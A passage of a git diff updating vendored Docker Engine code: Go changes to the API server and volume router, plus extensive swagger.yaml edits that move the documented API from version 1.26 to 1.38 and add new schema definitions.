-	volume, err := v.backend.VolumeCreate(req.Name, req.Driver, req.DriverOpts, req.Labels)
+	volume, err := v.backend.Create(ctx, req.Name, req.Driver, opts.WithCreateOptions(req.DriverOpts), opts.WithCreateLabels(req.Labels))
 	if err != nil {
 		return err
 	}
@@ -60,7 +71,7 @@ func (v *volumeRouter) deleteVolumes(ctx context.Context, w http.ResponseWriter,
 		return err
 	}
 	force := httputils.BoolValue(r, "force")
-	if err := v.backend.VolumeRm(vars["name"], force); err != nil {
+	if err := v.backend.Remove(ctx, vars["name"], opts.WithPurgeOnError(force)); err != nil {
 		return err
 	}
 	w.WriteHeader(http.StatusNoContent)
@@ -72,7 +83,12 @@ func (v *volumeRouter) postVolumesPrune(ctx context.Context, w http.ResponseWrit
 		return err
 	}
 
-	pruneReport, err := v.backend.VolumesPrune(filters.Args{})
+	pruneFilters, err := filters.FromJSON(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+
+	pruneReport, err := v.backend.Prune(ctx, pruneFilters)
 	if err != nil {
 		return err
 	}
diff --git a/vendor/github.com/docker/docker/api/server/router_swapper.go b/vendor/github.com/docker/docker/api/server/router_swapper.go
index 1ecc7a7f39..e8087492c4 100644
--- a/vendor/github.com/docker/docker/api/server/router_swapper.go
+++ b/vendor/github.com/docker/docker/api/server/router_swapper.go
@@ -1,4 +1,4 @@
-package server
+package server // import "github.com/docker/docker/api/server"
 
 import (
 	"net/http"
diff --git a/vendor/github.com/docker/docker/api/server/server.go b/vendor/github.com/docker/docker/api/server/server.go
index 60ee075c79..3874a56ce5 100644
--- a/vendor/github.com/docker/docker/api/server/server.go
+++ b/vendor/github.com/docker/docker/api/server/server.go
@@ -1,19 +1,19 @@
-package server
+package server // import "github.com/docker/docker/api/server"
 
 import (
+	"context"
 	"crypto/tls"
-	"fmt"
 	"net"
 	"net/http"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/errors"
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/server/middleware"
 	"github.com/docker/docker/api/server/router"
+	"github.com/docker/docker/api/server/router/debug"
+	"github.com/docker/docker/dockerversion"
 	"github.com/gorilla/mux"
-	"golang.org/x/net/context"
+	"github.com/sirupsen/logrus"
 )
 
 // versionMatcher defines a variable matcher to be parsed by the router
@@ -23,7 +23,6 @@ const versionMatcher = "/v{version:[0-9.]+}"
 // Config provides the configuration for the API server
 type Config struct {
 	Logging     bool
-	EnableCors  bool
 	CorsHeaders string
 	Version     string
 	SocketGroup string
@@ -91,13 +90,12 @@ func (s *Server) serveAPI() error {
 		}(srv)
 	}
 
-	for i := 0; i < len(s.servers); i++ {
+	for range s.servers {
 		err := <-chErrors
 		if err != nil {
 			return err
 		}
 	}
-
 	return nil
 }
 
@@ -128,7 +126,11 @@ func (s *Server) makeHTTPHandler(handler httputils.APIFunc) http.HandlerFunc {
 		// apply to all requests. Data that is specific to the
 		// immediate function being called should still be passed
 		// as 'args' on the function call.
-		ctx := context.WithValue(context.Background(), httputils.UAStringKey, r.Header.Get("User-Agent"))
+
+		// use intermediate variable to prevent "should not use basic type
+		// string as key in context.WithValue" golint errors
+		var ki interface{} = dockerversion.UAStringKey
+		ctx := context.WithValue(context.Background(), ki, r.Header.Get("User-Agent"))
 		handlerFunc := s.handlerWithGlobalMiddlewares(handler)
 
 		vars := mux.Vars(r)
@@ -138,11 +140,9 @@ func (s *Server) makeHTTPHandler(handler httputils.APIFunc) http.HandlerFunc {
 
 		if err := handlerFunc(ctx, w, r, vars); err != nil {
 			statusCode := httputils.GetHTTPErrorStatusCode(err)
-			errFormat := "%v"
-			if statusCode == http.StatusInternalServerError {
-				errFormat = "%+v"
+			if statusCode >= 500 {
+				logrus.Errorf("Handler for %s %s returned error: %v", r.Method, r.URL.Path, err)
 			}
-			logrus.Errorf("Handler for %s %s returned error: "+errFormat, r.Method, r.URL.Path, err)
 			httputils.MakeErrorHandler(err)(w, r)
 		}
 	}
@@ -150,18 +150,23 @@ func (s *Server) makeHTTPHandler(handler httputils.APIFunc) http.HandlerFunc {
 
 // InitRouter initializes the list of routers for the server.
 // This method also enables the Go profiler if enableProfiler is true.
-func (s *Server) InitRouter(enableProfiler bool, routers ...router.Router) {
+func (s *Server) InitRouter(routers ...router.Router) {
 	s.routers = append(s.routers, routers...)
 
 	m := s.createMux()
-	if enableProfiler {
-		profilerSetup(m)
-	}
 	s.routerSwapper = &routerSwapper{
 		router: m,
 	}
 }
 
+type pageNotFoundError struct{}
+
+func (pageNotFoundError) Error() string {
+	return "page not found"
+}
+
+func (pageNotFoundError) NotFound() {}
+
 // createMux initializes the main router the server uses.
 func (s *Server) createMux() *mux.Router {
 	m := mux.NewRouter()
@@ -177,8 +182,14 @@ func (s *Server) createMux() *mux.Router {
 		}
 	}
 
-	err := errors.NewRequestNotFoundError(fmt.Errorf("page not found"))
-	notFoundHandler := httputils.MakeErrorHandler(err)
+	debugRouter := debug.NewRouter()
+	s.routers = append(s.routers, debugRouter)
+	for _, r := range debugRouter.Routes() {
+		f := s.makeHTTPHandler(r.Handler())
+		m.Path("/debug" + r.Path()).Handler(f)
+	}
+
+	notFoundHandler := httputils.MakeErrorHandler(pageNotFoundError{})
 	m.HandleFunc(versionMatcher+"/{path:.*}", notFoundHandler)
 	m.NotFoundHandler = notFoundHandler
 
@@ -196,15 +207,3 @@ func (s *Server) Wait(waitChan chan error) {
 	}
 	waitChan <- nil
 }
-
-// DisableProfiler reloads the server mux without adding the profiler routes.
-func (s *Server) DisableProfiler() {
-	s.routerSwapper.Swap(s.createMux())
-}
-
-// EnableProfiler reloads the server mux adding the profiler routes.
-func (s *Server) EnableProfiler() {
-	m := s.createMux()
-	profilerSetup(m)
-	s.routerSwapper.Swap(m)
-}
diff --git a/vendor/github.com/docker/docker/api/server/server_test.go b/vendor/github.com/docker/docker/api/server/server_test.go
index 11831c148d..e0fac30ab7 100644
--- a/vendor/github.com/docker/docker/api/server/server_test.go
+++ b/vendor/github.com/docker/docker/api/server/server_test.go
@@ -1,6 +1,7 @@
-package server
+package server // import "github.com/docker/docker/api/server"
 
 import (
+	"context"
 	"net/http"
 	"net/http/httptest"
 	"strings"
@@ -9,8 +10,6 @@ import (
 	"github.com/docker/docker/api"
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/server/middleware"
-
-	"golang.org/x/net/context"
 )
 
 func TestMiddlewares(t *testing.T) {
@@ -29,7 +28,7 @@ func TestMiddlewares(t *testing.T) {
 
 	localHandler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 		if httputils.VersionFromContext(ctx) == "" {
-			t.Fatalf("Expected version, got empty string")
+			t.Fatal("Expected version, got empty string")
 		}
 
 		if sv := w.Header().Get("Server"); !strings.Contains(sv, "Docker/0.1omega2") {
diff --git a/vendor/github.com/docker/docker/api/swagger.yaml b/vendor/github.com/docker/docker/api/swagger.yaml
index d19e8c9ca8..86374415fd 100644
--- a/vendor/github.com/docker/docker/api/swagger.yaml
+++ b/vendor/github.com/docker/docker/api/swagger.yaml
@@ -19,10 +19,10 @@ produces:
 consumes:
   - "application/json"
   - "text/plain"
-basePath: "/v1.26"
+basePath: "/v1.38"
 info:
   title: "Docker Engine API"
-  version: "1.26"
+  version: "1.38"
   x-logo:
     url: "https://docs.docker.com/images/logo-docker-main.png"
   description: |
@@ -42,28 +42,26 @@ info:
 
     # Versioning
 
-    The API is usually changed in each release of Docker, so API calls are versioned to ensure that clients don't break.
+    The API is usually changed in each release, so API calls are versioned to
+    ensure that clients don't break. To lock to a specific version of the API,
+    you prefix the URL with its version, for example, call `/v1.30/info` to use
+    the v1.30 version of the `/info` endpoint. If the API version specified in
+    the URL is not supported by the daemon, a HTTP `400 Bad Request` error message
+    is returned.
 
-    For Docker Engine >= 1.13.1, the API version is 1.26. To lock to this version, you prefix the URL with `/v1.26`. For example, calling `/info` is the same as calling `/v1.26/info`.
+    If you omit the version-prefix, the current version of the API (v1.38) is used.
+    For example, calling `/info` is the same as calling `/v1.38/info`. Using the
+    API without a version-prefix is deprecated and will be removed in a future release.
 
-    Engine releases in the near future should support this version of the API, so your client will continue to work even if it is talking to a newer Engine.
+    Engine releases in the near future should support this version of the API,
+    so your client will continue to work even if it is talking to a newer Engine.
 
-    In previous versions of Docker, it was possible to access the API without providing a version. This behaviour is now deprecated will be removed in a future version of Docker.
+    The API uses an open schema model, which means server may add extra properties
+    to responses. Likewise, the server will ignore any extra query parameters and
+    request body properties. When you write clients, you need to ignore additional
+    properties in responses to ensure they do not break when talking to newer
+    daemons.
 
-    The API uses an open schema model, which means server may add extra properties to responses. Likewise, the server will ignore any extra query parameters and request body properties. When you write clients, you need to ignore additional properties in responses to ensure they do not break when talking to newer Docker daemons.
-
-    This documentation is for version 1.26 of the API, which was introduced with Docker 1.13.1. Use this table to find documentation for previous versions of the API:
-
-    Docker version  | API version | Changes
-    ----------------|-------------|---------
-    1.13.0 | [1.25](https://docs.docker.com/engine/api/v1.25/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-25-api-changes)
-    1.12.x | [1.24](https://docs.docker.com/engine/api/v1.24/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-24-api-changes)
-    1.11.x | [1.23](https://docs.docker.com/engine/api/v1.23/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-23-api-changes)
-    1.10.x | [1.22](https://docs.docker.com/engine/api/v1.22/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-22-api-changes)
-    1.9.x | [1.21](https://docs.docker.com/engine/api/v1.21/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-21-api-changes)
-    1.8.x | [1.20](https://docs.docker.com/engine/api/v1.20/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-20-api-changes)
-    1.7.x | [1.19](https://docs.docker.com/engine/api/v1.19/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-19-api-changes)
-    1.6.x | [1.18](https://docs.docker.com/engine/api/v1.18/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-18-api-changes)
 
     # Authentication
 
@@ -91,7 +89,7 @@ info:
 # The tags on paths define the menu sections in the ReDoc documentation, so
 # the usage of tags must make sense for that:
 # - They should be singular, not plural.
-# - There should not be too many tags, or the menu becomes unwieldly. For
+# - There should not be too many tags, or the menu becomes unwieldy. For
 #   example, it is preferable to add a path to the "System" tag instead of
 #   creating a tag with a single path in it.
 # - The order of tags in this list defines the order in the menu.
@@ -117,8 +115,6 @@ tags:
       Run new commands inside running containers. See the [command-line reference](https://docs.docker.com/engine/reference/commandline/exec/) for more information.
 
       To exec a command in a container, you first need to create an exec instance, then start it. These two API endpoints are wrapped up in a single command-line command, `docker exec`.
-  - name: "Secret"
-    x-displayName: "Secrets"
   # Swarm things
   - name: "Swarm"
     x-displayName: "Swarm"
@@ -136,6 +132,14 @@ tags:
     x-displayName: "Tasks"
     description: |
       A task is a container running on a swarm. It is the atomic scheduling unit of swarm. Swarm mode must be enabled for these endpoints to work.
+  - name: "Secret"
+    x-displayName: "Secrets"
+    description: |
+      Secrets are sensitive data that can be used by services. Swarm mode must be enabled for these endpoints to work.
+  - name: "Config"
+    x-displayName: "Configs"
+    description: |
+      Configs are application configurations that can be used by services. Swarm mode must be enabled for these endpoints to work.
   # System things
   - name: "Plugin"
     x-displayName: "Plugins"
@@ -151,6 +155,7 @@ definitions:
       IP:
         type: "string"
         format: "ip-address"
+        description: "Host IP address that the container's port is mapped to"
       PrivatePort:
         type: "integer"
         format: "uint16"
@@ -163,7 +168,7 @@ definitions:
       Type:
         type: "string"
         x-nullable: false
-        enum: ["tcp", "udp"]
+        enum: ["tcp", "udp", "sctp"]
     example:
       PrivatePort: 8080
       PublicPort: 80
@@ -225,6 +230,7 @@ definitions:
         type: "string"
       Source:
         description: "Mount source (e.g. a volume name, a host path)."
+        type: "string"
       Type:
         description: |
           The mount type. Available types:
@@ -240,12 +246,16 @@ definitions:
       ReadOnly:
         description: "Whether the mount should be read-only."
         type: "boolean"
+      Consistency:
+        description: "The consistency requirement for the mount: `default`, `consistent`, `cached`, or `delegated`."
+        type: "string"
       BindOptions:
         description: "Optional configuration for the `bind` type."
         type: "object"
         properties:
           Propagation:
             description: "A propagation mode with the value `[r]private`, `[r]shared`, or `[r]slave`."
+            type: "string"
             enum:
               - "private"
               - "rprivate"
@@ -289,6 +299,7 @@ definitions:
           Mode:
             description: "The permission mode for the tmpfs mount in an integer."
             type: "integer"
+
   RestartPolicy:
     description: |
       The behavior to apply when the container exits. The default is not to restart.
@@ -299,17 +310,18 @@ definitions:
       Name:
         type: "string"
         description: |
+          - Empty string means not to restart
           - `always` Always restart
           - `unless-stopped` Restart always except when the user has manually stopped the container
           - `on-failure` Restart only when the container exit code is non-zero
         enum:
+          - ""
           - "always"
           - "unless-stopped"
           - "on-failure"
       MaximumRetryCount:
         type: "integer"
         description: "If `on-failure` is used, the number of times to retry before giving up"
-    default: {}
 
   Resources:
     description: "A container's resources (cgroups config, ulimits, etc)"
@@ -322,6 +334,7 @@ definitions:
       Memory:
         description: "Memory limit in bytes."
         type: "integer"
+        format: "int64"
         default: 0
       # Applicable to UNIX platforms
       CgroupParent:
@@ -387,6 +400,7 @@ definitions:
       CpusetCpus:
         description: "CPUs in which to allow execution (e.g., `0-3`, `0,1`)"
         type: "string"
+        example: "0-3"
       CpusetMems:
         description: "Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems."
         type: "string"
@@ -395,6 +409,12 @@ definitions:
         type: "array"
         items:
           $ref: "#/definitions/DeviceMapping"
+      DeviceCgroupRules:
+        description: "a list of cgroup rules to apply to the container"
+        type: "array"
+        items:
+          type: "string"
+          example: "c 13:* rwm"
       DiskQuota:
         description: "Disk limit (in bytes)."
         type: "integer"
@@ -424,6 +444,10 @@ definitions:
       OomKillDisable:
         description: "Disable OOM Killer for the container."
         type: "boolean"
+      Init:
+        description: "Run an init inside the container that forwards signals and reaps processes. This field is omitted if empty, and the default (as configured on the daemon) is used."
+        type: "boolean"
+        x-nullable: true
       PidsLimit:
         description: "Tune a container's pids limit. Set -1 for unlimited."
         type: "integer"
@@ -468,6 +492,81 @@ definitions:
         type: "integer"
         format: "int64"
 
+  ResourceObject:
+    description: "An object describing the resources which can be advertised by a node and requested by a task"
+    type: "object"
+    properties:
+      NanoCPUs:
+        type: "integer"
+        format: "int64"
+        example: 4000000000
+      MemoryBytes:
+        type: "integer"
+        format: "int64"
+        example: 8272408576
+      GenericResources:
+        $ref: "#/definitions/GenericResources"
+
+  GenericResources:
+    description: "User-defined resources can be either Integer resources (e.g, `SSD=3`) or String resources (e.g, `GPU=UUID1`)"
+    type: "array"
+    items:
+      type: "object"
+      properties:
+        NamedResourceSpec:
+          type: "object"
+          properties:
+            Kind:
+              type: "string"
+            Value:
+              type: "string"
+        DiscreteResourceSpec:
+          type: "object"
+          properties:
+            Kind:
+              type: "string"
+            Value:
+              type: "integer"
+              format: "int64"
+    example:
+      - DiscreteResourceSpec:
+          Kind: "SSD"
+          Value: 3
+      - NamedResourceSpec:
+          Kind: "GPU"
+          Value: "UUID1"
+      - NamedResourceSpec:
+          Kind: "GPU"
+          Value: "UUID2"
+
+  HealthConfig:
+    description: "A test to perform to check that the container is healthy."
+    type: "object"
+    properties:
+      Test:
+        description: |
+          The test to perform. Possible values are:
+
+          - `[]` inherit healthcheck from image or parent image
+          - `["NONE"]` disable healthcheck
+          - `["CMD", args...]` exec arguments directly
+          - `["CMD-SHELL", command]` run command with system's default shell
+        type: "array"
+        items:
+          type: "string"
+      Interval:
+        description: "The time to wait between checks in nanoseconds. It should be 0 or at least 1000000 (1 ms). 0 means inherit."
+        type: "integer"
+      Timeout:
+        description: "The time to wait before considering the check to have hung. It should be 0 or at least 1000000 (1 ms). 0 means inherit."
+        type: "integer"
+      Retries:
+        description: "The number of consecutive failures needed to consider a container as unhealthy. 0 means inherit."
+        type: "integer"
+      StartPeriod:
+        description: "Start period for the container to initialize before starting health-retries countdown in nanoseconds. It should be 0 or at least 1000000 (1 ms). 0 means inherit."
+        type: "integer"
+
   HostConfig:
     description: "Container configuration that depends on the host we are running on"
     allOf:
@@ -481,7 +580,7 @@ definitions:
               A list of volume bindings for this container. Each volume binding is a string in one of these forms:
 
               - `host-src:container-dest` to bind-mount a host path into the container. Both `host-src`, and `container-dest` must be an _absolute_ path.
-              - `host-src:container-dest:ro` to make the bind-mount read-only inside the container. Both `host-src`, and `container-dest` must be an _absolute_ path.
+              - `host-src:container-dest:ro` to make the bind mount read-only inside the container. Both `host-src`, and `container-dest` must be an _absolute_ path.
               - `volume-name:container-dest` to bind-mount a volume managed by a volume driver into the container. `container-dest` must be an _absolute_ path.
               - `volume-name:container-dest:ro` to mount the volume read-only inside the container.  `container-dest` must be an _absolute_ path.
             items:
@@ -514,17 +613,7 @@ definitions:
             description: "Network mode to use for this container. Supported standard values are: `bridge`, `host`, `none`, and `container:<name|id>`. Any other value is taken
               as a custom network's name to which this container should connect to."
           PortBindings:
-            type: "object"
-            description: "A map of exposed container ports and the host port they should map to."
-            additionalProperties:
-              type: "object"
-              properties:
-                HostIp:
-                  type: "string"
-                  description: "The host IP address"
-                HostPort:
-                  type: "string"
-                  description: "The host port number, as a string"
+            $ref: "#/definitions/PortMap"
           RestartPolicy:
             $ref: "#/definitions/RestartPolicy"
           AutoRemove:
@@ -583,7 +672,17 @@ definitions:
               type: "string"
           IpcMode:
             type: "string"
-            description: "IPC namespace to use for the container."
+            description: |
+                    IPC sharing mode for the container. Possible values are:
+
+                    - `"none"`: own private IPC namespace, with /dev/shm not mounted
+                    - `"private"`: own private IPC namespace
+                    - `"shareable"`: own private IPC namespace, with a possibility to share it with other containers
+                    - `"container:<name|id>"`: join another (shareable) container's IPC namespace
+                    - `"host"`: use the host system's IPC namespace
+
+                    If not specified, daemon default is used, which can either be `"private"`
+                    or `"shareable"`, depending on daemon version and configuration.
           Cgroup:
             type: "string"
             description: "Cgroup to use for the container."
@@ -595,6 +694,7 @@ definitions:
           OomScoreAdj:
             type: "integer"
             description: "An integer value containing the score given to the container in order to tune OOM killer preferences."
+            example: 500
           PidMode:
             type: "string"
             description: |
@@ -607,7 +707,15 @@ definitions:
             description: "Gives the container full access to the host."
           PublishAllPorts:
             type: "boolean"
-            description: "Allocates a random host port for all of a container's exposed ports."
+            description: |
+              Allocates an ephemeral host port for all of a container's
+              exposed ports.
+
+              Ports are de-allocated when the container stops and allocated when the container starts.
+              The allocated port might be changed when restarting the container.
+
+              The port is selected from the ephemeral port range that depends on the kernel.
+              For example, on Linux the range is defined by `/proc/sys/net/ipv4/ip_local_port_range`.
           ReadonlyRootfs:
             type: "boolean"
             description: "Mount the container's root filesystem as read only."
@@ -664,8 +772,18 @@ definitions:
               - "default"
               - "process"
               - "hyperv"
+          MaskedPaths:
+            type: "array"
+            description: "The list of paths to be masked inside the container (this overrides the default set of paths)"
+            items:
+              type: "string"
+          ReadonlyPaths:
+            type: "array"
+            description: "The list of paths to be set as read-only inside the container (this overrides the default set of paths)"
+            items:
+              type: "string"
 
-  Config:
+  ContainerConfig:
     description: "Configuration for a container that is portable between hosts"
     type: "object"
     properties:
@@ -694,7 +812,7 @@ definitions:
         description: |
           An object mapping ports to an empty object in the form:
 
-          `{"<port>/<tcp|udp>": {}}`
+          `{"<port>/<tcp|udp|sctp>": {}}`
         type: "object"
         additionalProperties:
           type: "object"
@@ -715,41 +833,17 @@ definitions:
         default: false
       Env:
         description: |
-          A list of environment variables to set inside the container in the form `["VAR=value", ...]`
+          A list of environment variables to set inside the container in the form `["VAR=value", ...]`. A variable without `=` is removed from the environment, rather than to have an empty value.
         type: "array"
         items:
           type: "string"
       Cmd:
         description: "Command to run specified as a string or an array of strings."
-        type:
-          - "array"
-          - "string"
+        type: "array"
         items:
           type: "string"
       Healthcheck:
-        description: "A test to perform to check that the container is healthy."
-        type: "object"
-        properties:
-          Test:
-            description: |
-              The test to perform. Possible values are:
-
-              - `{}` inherit healthcheck from image or parent image
-              - `{"NONE"}` disable healthcheck
-              - `{"CMD", args...}` exec arguments directly
-              - `{"CMD-SHELL", command}` run command with system's default shell
-            type: "array"
-            items:
-              type: "string"
-          Interval:
-            description: "The time to wait between checks in nanoseconds. 0 means inherit."
-            type: "integer"
-          Timeout:
-            description: "The time to wait before considering the check to have hung. 0 means inherit."
-            type: "integer"
-          Retries:
-            description: "The number of consecutive failures needed to consider a container as unhealthy. 0 means inherit."
-            type: "integer"
+        $ref: "#/definitions/HealthConfig"
       ArgsEscaped:
         description: "Command is already escaped (Windows only)"
         type: "boolean"
@@ -759,12 +853,11 @@ definitions:
       Volumes:
         description: "An object mapping mount point paths inside the container to empty objects."
         type: "object"
-        properties:
-          additionalProperties:
-            type: "object"
-            enum:
-              - {}
-            default: {}
+        additionalProperties:
+          type: "object"
+          enum:
+            - {}
+          default: {}
       WorkingDir:
         description: "The working directory for commands to run in."
         type: "string"
@@ -773,9 +866,7 @@ definitions:
           The entry point for the container as a string or an array of strings.
 
           If the array consists of exactly one empty string (`[""]`) then the entry point is reset to system default (i.e., the entry point used by docker when there is no `ENTRYPOINT` instruction in the `Dockerfile`).
-        type:
-          - "array"
-          - "string"
+        type: "array"
         items:
           type: "string"
       NetworkDisabled:
@@ -808,43 +899,258 @@ definitions:
         items:
           type: "string"
 
-  NetworkConfig:
-    description: "TODO: check is correct"
+  NetworkSettings:
+    description: "NetworkSettings exposes the network settings in the API"
     type: "object"
     properties:
       Bridge:
+        description: Name of the network'a bridge (for example, `docker0`).
+        type: "string"
+        example: "docker0"
+      SandboxID:
+        description: SandboxID uniquely represents a container's network stack.
+        type: "string"
+        example: "9d12daf2c33f5959c8bf90aa513e4f65b561738661003029ec84830cd503a0c3"
+      HairpinMode:
+        description: |
+          Indicates if hairpin NAT should be enabled on the virtual interface.
+        type: "boolean"
+        example: false
+      LinkLocalIPv6Address:
+        description: IPv6 unicast address using the link-local prefix.
+        type: "string"
+        example: "fe80::42:acff:fe11:1"
+      LinkLocalIPv6PrefixLen:
+        description: Prefix length of the IPv6 unicast address.
+        type: "integer"
+        example: "64"
+      Ports:
+        $ref: "#/definitions/PortMap"
+      SandboxKey:
+        description: SandboxKey identifies the sandbox
+        type: "string"
+        example: "/var/run/docker/netns/8ab54b426c38"
+
+      # TODO is SecondaryIPAddresses actually used?
+      SecondaryIPAddresses:
+        description: ""
+        type: "array"
+        items:
+          $ref: "#/definitions/Address"
+        x-nullable: true
+
+      # TODO is SecondaryIPv6Addresses actually used?
+      SecondaryIPv6Addresses:
+        description: ""
+        type: "array"
+        items:
+          $ref: "#/definitions/Address"
+        x-nullable: true
+
+      # TODO properties below are part of DefaultNetworkSettings, which is
+      # marked as deprecated since Docker 1.9 and to be removed in Docker v17.12
+      EndpointID:
+        description: |
+          EndpointID uniquely represents a service endpoint in a Sandbox.
+
+          <p><br /></p>
+
+          > **Deprecated**: This field is only propagated when attached to the
+          > default "bridge" network. Use the information from the "bridge"
+          > network inside the `Networks` map instead, which contains the same
+          > information. This field was deprecated in Docker 1.9 and is scheduled
+          > to be removed in Docker 17.12.0
         type: "string"
+        example: "b88f5b905aabf2893f3cbc4ee42d1ea7980bbc0a92e2c8922b1e1795298afb0b"
       Gateway:
+        description: |
+          Gateway address for the default "bridge" network.
+
+          <p><br /></p>
+
+          > **Deprecated**: This field is only propagated when attached to the
+          > default "bridge" network. Use the information from the "bridge"
+          > network inside the `Networks` map instead, which contains the same
+          > information. This field was deprecated in Docker 1.9 and is scheduled
+          > to be removed in Docker 17.12.0
         type: "string"
-      Address:
+        example: "172.17.0.1"
+      GlobalIPv6Address:
+        description: |
+          Global IPv6 address for the default "bridge" network.
+
+          <p><br /></p>
+
+          > **Deprecated**: This field is only propagated when attached to the
+          > default "bridge" network. Use the information from the "bridge"
+          > network inside the `Networks` map instead, which contains the same
+          > information. This field was deprecated in Docker 1.9 and is scheduled
+          > to be removed in Docker 17.12.0
+        type: "string"
+        example: "2001:db8::5689"
+      GlobalIPv6PrefixLen:
+        description: |
+          Mask length of the global IPv6 address.
+
+          <p><br /></p>
+
+          > **Deprecated**: This field is only propagated when attached to the
+          > default "bridge" network. Use the information from the "bridge"
+          > network inside the `Networks` map instead, which contains the same
+          > information. This field was deprecated in Docker 1.9 and is scheduled
+          > to be removed in Docker 17.12.0
+        type: "integer"
+        example: 64
+      IPAddress:
+        description: |
+          IPv4 address for the default "bridge" network.
+
+          <p><br /></p>
+
+          > **Deprecated**: This field is only propagated when attached to the
+          > default "bridge" network. Use the information from the "bridge"
+          > network inside the `Networks` map instead, which contains the same
+          > information. This field was deprecated in Docker 1.9 and is scheduled
+          > to be removed in Docker 17.12.0
         type: "string"
+        example: "172.17.0.4"
       IPPrefixLen:
+        description: |
+          Mask length of the IPv4 address.
+
+          <p><br /></p>
+
+          > **Deprecated**: This field is only propagated when attached to the
+          > default "bridge" network. Use the information from the "bridge"
+          > network inside the `Networks` map instead, which contains the same
+          > information. This field was deprecated in Docker 1.9 and is scheduled
+          > to be removed in Docker 17.12.0
         type: "integer"
+        example: 16
+      IPv6Gateway:
+        description: |
+          IPv6 gateway address for this network.
+
+          <p><br /></p>
+
+          > **Deprecated**: This field is only propagated when attached to the
+          > default "bridge" network. Use the information from the "bridge"
+          > network inside the `Networks` map instead, which contains the same
+          > information. This field was deprecated in Docker 1.9 and is scheduled
+          > to be removed in Docker 17.12.0
+        type: "string"
+        example: "2001:db8:2::100"
       MacAddress:
+        description: |
+          MAC address for the container on the default "bridge" network.
+
+          <p><br /></p>
+
+          > **Deprecated**: This field is only propagated when attached to the
+          > default "bridge" network. Use the information from the "bridge"
+          > network inside the `Networks` map instead, which contains the same
+          > information. This field was deprecated in Docker 1.9 and is scheduled
+          > to be removed in Docker 17.12.0
+        type: "string"
+        example: "02:42:ac:11:00:04"
+      Networks:
+        description: |
+          Information about all networks that the container is connected to.
+        type: "object"
+        additionalProperties:
+          $ref: "#/definitions/EndpointSettings"
+
+  Address:
+    description: Address represents an IPv4 or IPv6 IP address.
+    type: "object"
+    properties:
+      Addr:
+        description: IP address.
+        type: "string"
+      PrefixLen:
+        description: Mask length of the IP address.
+        type: "integer"
+
+  PortMap:
+    description: |
+      PortMap describes the mapping of container ports to host ports, using the
+      container's port-number and protocol as key in the format `<port>/<protocol>`,
+      for example, `80/udp`.
+
+      If a container's port is mapped for multiple protocols, separate entries
+      are added to the mapping table.
+    type: "object"
+    additionalProperties:
+      type: "array"
+      items:
+        $ref: "#/definitions/PortBinding"
+    example:
+      "443/tcp":
+        - HostIp: "127.0.0.1"
+          HostPort: "4443"
+      "80/tcp":
+        - HostIp: "0.0.0.0"
+          HostPort: "80"
+        - HostIp: "0.0.0.0"
+          HostPort: "8080"
+      "80/udp":
+        - HostIp: "0.0.0.0"
+          HostPort: "80"
+      "53/udp":
+        - HostIp: "0.0.0.0"
+          HostPort: "53"
+      "2377/tcp": null
+
+  PortBinding:
+    description: |
+      PortBinding represents a binding between a host IP address and a host
+      port.
+    type: "object"
+    x-nullable: true
+    properties:
+      HostIp:
+        description: "Host IP address that the container's port is mapped to."
         type: "string"
-      PortMapping:
+        example: "127.0.0.1"
+      HostPort:
+        description: "Host port number that the container's port is mapped to."
         type: "string"
-      Ports:
-        type: "array"
-        items:
-          $ref: "#/definitions/Port"
+        example: "4443"
 
-  GraphDriver:
-    description: "Information about this container's graph driver."
+  GraphDriverData:
+    description: "Information about a container's graph driver."
     type: "object"
+    required: [Name, Data]
     properties:
       Name:
         type: "string"
+        x-nullable: false
       Data:
         type: "object"
+        x-nullable: false
         additionalProperties:
           type: "string"
 
   Image:
     type: "object"
+    required:
+      - Id
+      - Parent
+      - Comment
+      - Created
+      - Container
+      - DockerVersion
+      - Author
+      - Architecture
+      - Os
+      - Size
+      - VirtualSize
+      - GraphDriver
+      - RootFS
     properties:
       Id:
         type: "string"
+        x-nullable: false
       RepoTags:
         type: "array"
         items:
@@ -855,43 +1161,63 @@ definitions:
           type: "string"
       Parent:
         type: "string"
+        x-nullable: false
       Comment:
         type: "string"
+        x-nullable: false
       Created:
         type: "string"
+        x-nullable: false
       Container:
         type: "string"
+        x-nullable: false
       ContainerConfig:
-        $ref: "#/definitions/Config"
+        $ref: "#/definitions/ContainerConfig"
       DockerVersion:
         type: "string"
+        x-nullable: false
       Author:
         type: "string"
+        x-nullable: false
       Config:
-        $ref: "#/definitions/Config"
+        $ref: "#/definitions/ContainerConfig"
       Architecture:
         type: "string"
+        x-nullable: false
       Os:
         type: "string"
+        x-nullable: false
+      OsVersion:
+        type: "string"
       Size:
         type: "integer"
         format: "int64"
+        x-nullable: false
       VirtualSize:
         type: "integer"
         format: "int64"
+        x-nullable: false
       GraphDriver:
-        $ref: "#/definitions/GraphDriver"
+        $ref: "#/definitions/GraphDriverData"
       RootFS:
         type: "object"
+        required: [Type]
         properties:
           Type:
             type: "string"
+            x-nullable: false
           Layers:
             type: "array"
             items:
               type: "string"
           BaseLayer:
             type: "string"
+      Metadata:
+        type: "object"
+        properties:
+          LastTagTime:
+            type: "string"
+            format: "dateTime"
 
   ImageSummary:
     type: "object"
@@ -992,6 +1318,10 @@ definitions:
         type: "string"
         description: "Mount path of the volume on the host."
         x-nullable: false
+      CreatedAt:
+        type: "string"
+        format: "dateTime"
+        description: "Date/Time the volume was created."
       Status:
         type: "object"
         description: |
@@ -1022,17 +1352,27 @@ definitions:
           type: "string"
       UsageData:
         type: "object"
+        x-nullable: true
         required: [Size, RefCount]
+        description: |
+          Usage details about the volume. This information is used by the
+          `GET /system/df` endpoint, and omitted in other endpoints.
         properties:
           Size:
             type: "integer"
-            description: "The disk space used by the volume (local driver only)"
             default: -1
+            description: |
